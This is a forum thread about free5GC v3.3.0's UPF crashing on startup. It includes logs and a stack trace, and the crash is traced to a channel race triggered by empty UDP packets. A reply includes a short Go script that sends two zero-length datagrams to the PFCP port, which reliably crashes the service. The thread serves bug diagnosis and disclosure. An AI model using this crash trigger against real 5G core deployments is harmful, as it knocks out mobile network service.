Latest v3.3.0 UPF crashing on startup

Hi,

My UPF/PFCP server keeps crashing within a few seconds of starting. The UPF is running separately from all the other free5gc components, and without the N3IWF, if that makes a difference.

The main error seems to be “panic: send on closed channel”

I verified that the gtp5g module is loaded.

Anything I am missing? Is anyone else encountering similar issues? It's failing consistently.

~/free5gc$ ./run.sh
log path: ./log/20231003_000057/
2023-10-03T00:00:57.445156729Z [INFO][UPF][Main] UPF version:
	free5GC version: v3.3.0
	build time:      2023-09-29T23:05:35Z
	commit hash:     4474dc86
	commit time:     2023-06-08T03:37:39Z
	go version:      go1.17.8 linux/amd64
2023-10-03T00:00:57.445646359Z [INFO][UPF][CFG] Read config from [./config/upfcfg.yaml]
2023-10-03T00:00:57.445888028Z [INFO][UPF][CFG] ==================================================
2023-10-03T00:00:57.445908001Z [INFO][UPF][CFG] (*factory.Config)(0xc0003e2be0)({
	Version: (string) (len=5) "1.0.3",
	Description: (string) (len=31) "UPF initial local configuration",
	Pfcp: (*factory.Pfcp)(0xc000411a10)({
		Addr: (string) (len=12) "10.66.98.190",
		NodeID: (string) (len=12) "10.66.98.190",
		RetransTimeout: (time.Duration) 1s,
		MaxRetrans: (uint8) 3
	}),
	Gtpu: (*factory.Gtpu)(0xc000411bc0)({
		Forwarder: (string) (len=5) "gtp5g",
		IfList: ([]factory.IfInfo) (len=1 cap=1) {
			(factory.IfInfo) {
				Addr: (string) (len=12) "10.66.98.190",
				Type: (string) (len=2) "N3",
				Name: (string) "",
				IfName: (string) "",
				MTU: (uint32) 0
			}
		}
	}),
	DnnList: ([]factory.DnnList) (len=1 cap=1) {
		(factory.DnnList) {
			Dnn: (string) (len=8) "internet",
			Cidr: (string) (len=12) "10.60.0.0/24",
			NatIfName: (string) ""
		}
	},
	Logger: (*factory.Logger)(0xc0003bb1a0)({
		Enable: (bool) true,
		Level: (string) (len=4) "info",
		ReportCaller: (bool) false
	})
})
2023-10-03T00:00:57.445973036Z [INFO][UPF][CFG] ==================================================
2023-10-03T00:00:57.445984349Z [INFO][UPF][Main] Log level is set to [info]
2023-10-03T00:00:57.445998632Z [INFO][UPF][Main] Report Caller is set to [false]
2023-10-03T00:00:57.446173859Z [INFO][UPF][Main] starting Gtpu Forwarder [gtp5g]
2023-10-03T00:00:57.446187899Z [INFO][UPF][Main] GTP Address: "10.66.98.190:2152"
2023-10-03T00:00:57.453305208Z [INFO][UPF][BUFF] buff netlink server started
2023-10-03T00:00:57.453365416Z [INFO][UPF][Perio] perio server started
2023-10-03T00:00:57.453379396Z [INFO][UPF][Gtp5g] Forwarder started
2023-10-03T00:00:57.453520533Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] starting pfcp server
2023-10-03T00:00:57.453540642Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] pfcp server started
2023-10-03T00:00:57.453551405Z [INFO][UPF][Main] UPF started
MongoDB shell version v3.6.8
connecting to: mongodb://127.0.0.1:27017/free5gc
Implicit session: session { "id" : UUID("618ac29b-3a9b-497c-bb12-28e308a3e7cd") }
MongoDB server version: 3.6.8
false
2023-10-03T00:01:02.532424745Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] pfcp server stopped
2023-10-03T00:01:13.062752299Z [FATA][UPF][PFCP][LAddr:10.66.98.190:8805] panic: send on closed channel
goroutine 22 [running]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:24 +0x65
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).receiver.func1()
	/home/zuser/free5gc/NFs/upf/internal/pfcp/pfcp.go:192 +0x5d
panic({0x827580, 0x92e1c0})
	/usr/local/go/src/runtime/panic.go:1038 +0x215
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).receiver(0xc0001161a0, 0xc00044d210)
	/home/zuser/free5gc/NFs/upf/internal/pfcp/pfcp.go:212 +0x1c5
created by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main
	/home/zuser/free5gc/NFs/upf/internal/pfcp/pfcp.go:112 +0x1ef [pfcp.go:192][func1()]

Additional logs with the log level set to trace:

2023-10-03T22:11:45.348880252Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver starts to read...
MongoDB shell version v3.6.8
connecting to: mongodb://127.0.0.1:27017/free5gc
Implicit session: session { "id" : UUID("16fa63ad-c7d4-4e05-ad31-58f981fdbe17") }
MongoDB server version: 3.6.8
false
./run.sh: line 112: mongosh: command not found
2023-10-03T22:11:49.151354918Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver reads message(len=0)
2023-10-03T22:11:49.151415023Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver starts to read...
2023-10-03T22:11:49.151432651Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receive buf(len=0) from rcvCh
2023-10-03T22:11:49.151487946Z [INFO][UPF][PFCP][LAddr:10.66.98.190:8805] pfcp server stopped
2023-10-03T22:12:00.163145824Z [TRAC][UPF][PFCP][LAddr:10.66.98.190:8805] receiver reads message(len=0)
2023-10-03T22:12:00.163272620Z [FATA][UPF][PFCP][LAddr:10.66.98.190:8805] panic: send on closed channel

Hi @arvindn05,

I used a method to reproduce the error condition, but I’m not sure if it is the same as your case.
My procedure is as follows:

  1. Execute the UPF only; in my case, the PFCP server of the UPF listens on 127.0.0.8:8805.
  2. I wrote a script that sends empty data to the PFCP server twice (a minimal sketch of such a script is shown after this list).
  3. This produces the same error message as the one you provided.
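
For reference, here is a minimal sketch in Go of what such a script can look like (just an approximation of the idea, not my exact script; it assumes the 127.0.0.8:8805 address from step 1, so adjust it to your setup):

// repro.go: send two empty UDP datagrams to the UPF's PFCP port.
package main

import (
	"log"
	"net"
)

func main() {
	// PFCP listens on UDP port 8805; replace the address with your UPF's
	// PFCP address (e.g. 10.66.98.190:8805) if it is not on localhost.
	conn, err := net.Dial("udp", "127.0.0.8:8805")
	if err != nil {
		log.Fatal(err)
	}
	defer conn.Close()

	// Two zero-length datagrams: in the logs above, the first empty read
	// stops the PFCP server and the second one triggers the panic.
	for i := 0; i < 2; i++ {
		if _, err := conn.Write([]byte{}); err != nil {
			log.Fatal(err)
		}
	}
}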

Maybe you can check whether there is any process that keeps sending empty data to the PFCP server of the UPF.

I am listening on “10.66.98.190” instead of just localhost… let me try your suggestion of listening only on localhost to eliminate the possibility of something sending empty data.

@Johnson3310 Thank you very much for the tip. That was the issue: empty UDP packets being sent to the PFCP port cause the UPF to crash.
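
In case it helps anyone else reading this, my understanding from the trace logs above (a simplified illustration, not the actual go-upf pfcp.go code) is that the first zero-length read makes the PFCP main loop shut down and close its receive channel, and the receiver goroutine then pushes the next empty message into that already-closed channel, which is exactly the “send on closed channel” panic:

// Simplified shape of a "send on closed channel" race, NOT the real go-upf
// code; it just mirrors the sequence in the trace logs
// (read len=0 -> pfcp server stopped -> read len=0 -> panic).
package main

import "fmt"

func main() {
	rcvCh := make(chan []byte) // channel the receiver forwards datagrams into
	done := make(chan struct{})

	// Receiver goroutine: forwards every "datagram" it reads into rcvCh.
	go func() {
		defer func() {
			if r := recover(); r != nil {
				fmt.Println("panic:", r) // prints: panic: send on closed channel
			}
			close(done)
		}()
		for i := 0; i < 2; i++ {
			rcvCh <- []byte{} // pretend each read returned an empty datagram
		}
	}()

	<-rcvCh      // main loop sees the first empty message and decides to stop
	close(rcvCh) // ...and closes the channel while the receiver is still running

	<-done // the receiver's second send hits the closed channel and panics
}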
Should I file a bug for this, or do you know if it's a known issue?

Hi @arvindn05,

What did you mean by “The UPF is running separately from all the other free5gc components, and without the N3IWF, if that makes a difference”?
Is the UPF running on another machine?

Yes, I am running the UPF separately from the other core components.
Basically, in start.sh I set NF_LIST="" so that only the UPF process is started.

And on the “core” machine I run all the NFs except the UPF, while pointing the SMF to the UPF machine’s IP in its config.

Hi @arvindn05,

Should I file a bug for this, or do you know if it's a known issue?

I have already reported it to the free5GC team. Thank you for reporting the bug.